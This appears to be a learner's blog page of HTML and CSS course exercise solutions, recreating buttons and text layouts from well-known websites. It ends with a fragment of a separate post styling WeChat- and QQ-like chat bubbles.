    ​ Additional Information: This HTML CSS full course is a series of HTML CSS tutorials, teaching the major skills that we need to create complex websites. Each HTML CSS tutorial builds on a project and provides some HTML CSS exercises to practice what we learned. By the end, we’ll learn the basics of web development and we’ll be on our way to becoming a web developer and software engineer.

    ​ 其他信息:这个 HTML CSS 完整课程是一系列的 HTML CSS 教程,教授我们创建复杂网站所需的主要技能。每个 HTML CSS 教程都建立在一个项目的基础上,并提供一些 HTML CSS 练习来练习我们所学的知识。到最后,我们将学会网站开发的基础知识,我们将在成为一名网站开发人员和软件工程师的路上。

    1. HTML Basics

    HTML: HyperText Markup Language (tool we use to create websites)


    png

    • 1a. Create a button with the text “Click” inside
    1
    <button>Click</button>

    • 1b. Create 2 buttons. 1 with your name and 1 with your favorite food
    1
    2
    <button>GZ</button>
    <button>dumplings</button>

    • 1c. Create a paragraph with the text “Hello, World!” inside
    1
    <p>Hello, world!</p>

    Hello, world!

    • 1d. Create a paragraph below the previous paragraph and write something you did today
    1
    2
    <p>Hello, world!</p>
    <p>Today I got up early.</p>

    Hello, world!

    Today I got up early.

    png

    • 1e. Create a link to google.com (or a similar website for your country)
    1
    <a href="https://www.bilibili.com/">Open bilibili</a>

    Open bilibili

    • 1f. Make the link from the previous exercise (1e.) open in a new tab
    1
    <a href="https://www.bilibili.com/" target="_">Open bilibili</a>

    Open bilibili

    **Challenge Exercise **

    • 1g. Try to copy this design using HTML (the link goes to amazon.com)
    1
    2
    3
    4
    5
    6
    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p>Nike Black Running Shoes</p>
    <p>$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button>Add to Cart</button>
    <button>Buy now</button>

    Back to TaoBao

    Nike Black Running Shoes

    $39 - in stock.

    Free delivery tomorrow.


    2. CSS Basics

    CSS: Cascading Style Sheets (change the appearance of HTML elements)

    Youtube & Tweet

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    <style>
    .subscribe-button {
    background-color: rgb(200, 0, 0);
    color: white;
    border: none;
    height: 36px;
    width: 105px;
    border-radius: 2px;
    cursor: pointer;
    margin-right: 8px;
    }

    .join-button {
    background-color: white;
    border-color: rgb(41, 118, 211);
    border-style: solid;
    border-width: 1px;
    color: rgb(41, 118, 211);
    height: 36px;
    width: 62px;
    border-radius: 2px;
    cursor: pointer;
    }

    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    height: 36px;
    width: 74px;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    png

    • 2a. Uber
    • 2b. Amazon
    • 2c. GitHub
    • 2d. Bootstrap
    • 2e. Linkedln
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    width: 105px;
    height: 36px;
    cursor: pointer;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    width: 160px;
    height: 36px;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    height:40px;
    width:95px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    height:40px;
    width:105px;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:105px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 250px;
    cursor: pointer;
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:75px;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    png

    **Challenge Exercise **

    • 2f. Continuing from exercise 1g. recreate this design using CSS:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    <style>
    .title{
    margin: 20px 0px;
    font-size: 25px;
    font-weight: bold;
    }
    .price{
    color:rgb(0, 118, 0);
    font-size: 18px;
    font-weight: bold;
    }
    .Amazon-button-1{
    background-color: rgb(255, 216, 20);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    }
    .Amazon-button-2{
    background-color: rgb(255, 164, 28);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    png

    3. Hovers, Transitions, Shadows

    ​ 注意 Transitions 属性不要放到 hover 里, 否则移出时不会有 Transitions 的效果。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    <style>
    .subscribe-button {
    background-color: rgb(200, 0, 0);
    color: white;
    border: none;
    height: 36px;
    width: 105px;
    border-radius: 2px;
    cursor: pointer;
    margin-right: 8px;
    transition: opacity 0.15s;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(41, 118, 211);
    border-style: solid;
    border-width: 1px;
    color: rgb(41, 118, 211);
    height: 36px;
    width: 62px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(41, 118, 211);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    height: 36px;
    width: 74px;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    gif

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    width: 105px;
    height: 36px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    width: 160px;
    height: 36px;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    height:40px;
    width:95px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    height:40px;
    width:105px;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:105px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
    color: white
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 250px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:75px;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    **Challenge Exercise **

    gif

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    <style>
    a:hover {
    color:rgb(198, 96, 22);
    }
    .title{
    margin: 20px 0px;
    font-size: 25px;
    font-weight: bold;
    }
    .price{
    color:rgb(0, 118, 0);
    font-size: 18px;
    font-weight: bold;
    }
    .Amazon-button-1{
    background-color: rgb(255, 216, 20);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Amazon-button-1:hover {
    background-color: rgb(240, 200, 16);
    }
    .Amazon-button-1:active {
    opacity: 0.5;
    }
    .Amazon-button-2{
    background-color: rgb(255, 164, 28);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Amazon-button-2:hover {
    background-color: rgb(237, 120, 8);
    }
    .Amazon-button-2:active {
    opacity: 0.5;
    }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    4. Chrome DevTools & CSS Box Model

    CSS Box Model

    • how much space an element takes up
    • how far it is away from other elements

    gif

    • 4a. - 4e. Modify exercises 3a. - 3e. to use padding instead of height/width
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    padding: 8px 10px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    padding: 10px 26px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
    color: white
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    padding: 12px 26px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    • 4f. Update the Tweet button to use padding instead of height/width
    • 4g. Use the Chrome DevTools to get the exact color for the Subscribe button and update it int the code
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    <style>
    .subscribe-button {
    background-color: rgb(193, 0, 0);
    color: white;
    border: none;
    padding: 10px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: opacity 0.15s;
    vertical-align: top;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(6, 95, 212);
    border-style: solid;
    border-width: 1px;
    color: rgb(6, 95, 212);
    padding: 9px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(6, 95, 212);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    padding: 10px 16px;
    vertical-align: top;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png

    gif

    **Challenge Exercise **

    • 4h. Pagination
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <style>
    button{
    padding: 6px 2px;
    margin: 0px 5px;
    }
    a{
    margin: 0px 2px;
    }
    </style>
    <button>
    Back
    </button>
    <a href="https://www.youtube.com/">1</a>
    <a href="https://www.youtube.com/">2</a>
    <a href="https://www.youtube.com/">3</a>
    <a href="https://www.youtube.com/">4</a>
    <a href="https://www.youtube.com/">5</a>
    <button>
    Next
    </button>

    png

    • 4i. - 4k.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    <style>
    button{
    background-color: rgb(11, 136, 6);
    color: white;
    font-size: 15px;
    margin: 10px;
    vertical-align: top;
    border:none;
    padding: 6px 10px;
    }
    .stretch_button{
    transition: padding 1s;
    }
    .stretch_button:hover{
    padding: 12px 30px;
    }
    ._3d_click_button {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.4);
    }
    ._3d_click_button:active {
    margin-top: 15px;
    margin-left: 15px;
    box-shadow: none;
    }
    .margin_and_padding_together {
    transition: padding 0.3s,
    margin 0.3s;
    }
    .margin_and_padding_together:hover {
    margin-left: 5px;
    margin-right: 5px;
    padding-left: 15px;
    padding-right: 15px;
    }
    </style>
    <button class="stretch_button">Stretch</button>
    <button class="_3d_click_button">Shadow</button>
    <br/>
    <button class="margin_and_padding_together">One</button>
    <button class="margin_and_padding_together">Two</button>
    <button class="margin_and_padding_together">Three</button>

    png

    5. Text Styles

    • CSS Specificity: class name selector > element name selector

    • google 搜索 html entity greater than 得到 > 的 Entity Number &#62;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    <style>
    p {
    font-family: Arial;
    margin-top: 0;
    margin-bottom: 0;
    }
    .video-title {
    font-size: 18px;
    font-weight: bold;
    width: 280px;
    line-height: 24px;
    margin-bottom: 5px;
    }
    .video-stats {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-author {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-description {
    font-size: 14px;
    color:#606060;
    width: 280px;
    line-height: 20px;
    line-height: 22px;
    margin-top: 0;
    margin-bottom: 100px;
    }
    .apple-text {
    margin-bottom: 50px;
    font-size: 14px;
    background-color: #e34140;
    color: white;
    text-align: center;
    padding-top: 18px;
    padding-bottom: 18px;
    }
    .shop-link {
    margin-left: 5px;
    cursor: pointer;
    }
    .shop-link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="video-title">
    Talking Tech and AI with Google CEO Sundar Pichai!
    </p>

    <p class="video-stats">
    3.4M views &#183; 6month ago
    </p>

    <p class="video-author">
    Marques Brownlee &#10003;
    </p>

    <p class="video-description">
    Talking tech and AI on the heels of Google I/O.
    Also a daily driver phone reveal from Google's CEO.
    Shoutout to Sundar!
    </p>

    <p class="apple-text">
    Shop early for the best selection of holiday favourites.
    <span class="shop-link">Shop now &#62;</span>
    </p>

    png


    png

    • 5a. font = Tahoma
    1
    2
    3
    4
    5
    6
    7
    8
    9
    <style>
    p {
    font-family: Tahoma;
    font-weight: bold;
    font-size: 24px;
    }
    </style>

    <p> This is Tahoma Font</p>

    png

    • 5b. font = Arial
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    <style>
    p {
    font-family: Arial;
    }
    .title {
    font-weight: bold;
    font-size: 24px;
    margin: 0;
    }
    .introduce {
    color: red;
    font-style: italic;
    font-size: 16px;
    margin-top: 10px;
    }
    </style>

    <p class="title">Biggest Deals of the Year!</p>
    <p class="introduce">Sales end Tuesday</p>

    png

    • 5c. font = Verdana
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <style>
    p {
    font-family: Verdana;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin: 0;
    }
    .introduce {
    margin-top: 5px;
    color: #606060;
    }
    .decription {
    width: 300px;
    }
    .start_button {
    padding: 5px 12px;
    background-color: rgb(49, 126, 18);
    border: 0;
    border-radius: 5px;
    color: white;
    }
    </style>

    <p class="title">HTML CSS Course</p>
    <p class="introduce">Beginner to Pro</p>
    <p class="decription">
    In this course, we'll learn the skills
    you need to become a developer.
    </p>
    <button class="start_button">Get Started</button>

    png

    • 5d. font = Arial
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    <style>
    p {
    font-family: Arial;
    }
    .title {
    text-align: center;
    font-weight: bold;
    font-size: 30px;
    margin-bottom: 0;
    }
    .introduce {
    margin-top: 14px;
    text-align: center;
    }
    .link {
    text-align: center;
    color:rgb(0, 147, 196);
    cursor: pointer;
    }
    .link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="title">Shopping for your business?</p>
    <p class="introduce">See how Apple at Work can help.</p>
    <p class="link">Learn more &#62;</p>

    png

    png

    **Challenge Exercise **

    • 5e.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    <style>
    p {
    text-align: center;
    font-family: Arial;
    margin: 0;
    }
    .new {
    font-weight: bold;
    color: orange;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin-top: 5px;
    }
    .decription {
    font-weight: bold;
    font-size: 35px;
    margin-top: 5px;
    }
    .price {
    margin-top: 10px;
    }
    .buy_button {
    margin-top: 10px;
    color:white;
    font-family: Arial;
    border:none;
    padding: 5px 12px;
    border-radius: 16px;
    background-color: rgb(29, 115, 207);
    }
    </style>

    <p class="new">New</p>
    <p class="title">MacBook Pro</p>
    <p class="decription">Supercharged for pros.</p>
    <p class="price">From $1999</p>
    <center><button class="buy_button">Buy</button></center>

    png

    • 5f.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    <style>
    p {
    font-family: Arial;
    margin-top: 6px;
    margin-bottom: 6px;
    }
    .current {
    font-size: 32px;
    }
    .usd {
    color: #606060;
    }
    .rise {
    color:green;
    }
    .after_hours {
    color: #606060;
    }
    .decline {
    color:rgb(208, 0, 0);
    }
    </style>
    <p>
    <span class="current">1049.61 </span>
    <span class="usd">USD</span>
    </p>
    <p class="rise">+18.05 (1.75%) today</p>
    <p>
    <span class="after_hours">After hours 1,048.00 </span>
    <span class="decline">-1.61 (0.15%)</span>
    </p>

    png

    • 5g.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    <style>
    p {
    font-family: Arial;
    margin-top: 8px;
    margin-bottom: 8px;
    }
    .title {
    font-weight: bold;
    }
    .author {
    color:#888;
    }
    .at {
    color:rgb(31, 169, 255);
    }
    .text {
    margin-top: 18px;
    }
    </style>
    <p>
    <span class="title">freeCodeCamp.org</span>
    <span class="author">@freeCodeCamp 1h</span>
    </p>
    <p>As a web developer, you'll want to make your projects easy to use and navigate around.</p>
    <p class="text">
    Here
    <span class="at">@chp_it</span>
    outlines the top skills new developers should have.
    </p>

    png

    ]]>
    @@ -9086,7 +9086,7 @@ /posts/Diary-%E9%83%BD%E6%B6%A6%E5%9B%9E%E5%AE%B6%E6%89%8D%E6%83%B3%E7%9D%80%E5%86%99%E5%AF%84%E4%BA%86%E7%9A%84%E6%B2%B3%E6%91%86%E5%B8%A6%E5%AD%A6%E7%9A%84%E6%97%B6%E5%85%89%E7%9C%9F%E6%98%AF%E5%B1%91%E5%95%8A/ -
    ]]>
    +
    ]]>
    @@ -9113,7 +9113,7 @@ /posts/Web-html+css%E6%A8%A1%E6%8B%9F%E5%BE%AE%E4%BF%A1QQ%E8%81%8A%E5%A4%A9%E6%A1%86/ - 参考

    代码

    CSS

    .chat_box {
    display: grid;
    padding: 15px 10px;
    margin: 5px 0;
    transition: background-color 0.5s ease-in-out;
    }

    .left,
    .weixin,
    .qq {
    position: relative;
    max-width: min(400px, 75%);
    padding: 8px 10px;
    margin: 8px 0;
    border-radius: 5px;
    word-break: break-all;
    line-height: 24px;
    }

    .left {
    justify-self: left;
    left: 20px;
    }

    .weixin,
    .qq {
    justify-self: end;
    right: 20px;
    }

    .weixin {
    background-color: #9EEA6A;
    }

    .qq {
    background-color: #1E6EFF;
    color: #FFF;
    }

    .left::before,
    .weixin::before,
    .qq::before {
    content: '';
    position: absolute;
    top: 10px;
    width: 0;
    height: 0;
    border-style: solid;
    }

    .left::before {
    left: -8px;
    border-width: 8px 10px 8px 0;
    }

    .weixin::before {
    right: -9px;
    border-width: 8px 0 8px 10px;
    }

    .qq::before {
    right: -8px;
    border-width: 8px 0 8px 10px;
    }

    [data-theme='light'] {
    .chat_box {
    background-color: #f5f5f5;
    }

    .left {
    background-color: #FFF;
    }

    .left::before {
    border-color: transparent #fff transparent transparent;
    }

    .weixin::before {
    border-color: transparent transparent transparent #9EEA6A;
    }

    .qq::before {
    border-color: transparent transparent transparent #1E6EFF;
    }
    }

    [data-theme='dark'] {
    .chat_box {
    background-color: #111111;
    }

    .left,
    .weixin,
    .qq {
    color: #d5d5d5;
    }

    .left {
    background-color: #2c2c2c;
    }

    .weixin {
    background-color: #3eb477;
    color: #111111;
    }

    .qq {
    background-color: #2c2c2c;
    }

    .left::before {
    border-color: transparent #2c2c2c transparent transparent;
    }

    .weixin::before {
    border-color: transparent transparent transparent #3eb477;
    }

    .qq::before {
    border-color: transparent transparent transparent #2c2c2c;
    }
    }

    HTML

    <div class="chat_box">
    <div class="left">我会夺取你的灵魂!</div>
    <div class="weixin">哇哦~</div>
    <div class="qq">圣光会制裁你!</div>
    </div>

    测试

    古尔丹 VS 安度因!

    我会夺取你的灵魂!
    哇哦~
    圣光会制裁你!

    这次是你赢了…

    ]]>
    + 参考

    代码

    CSS

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
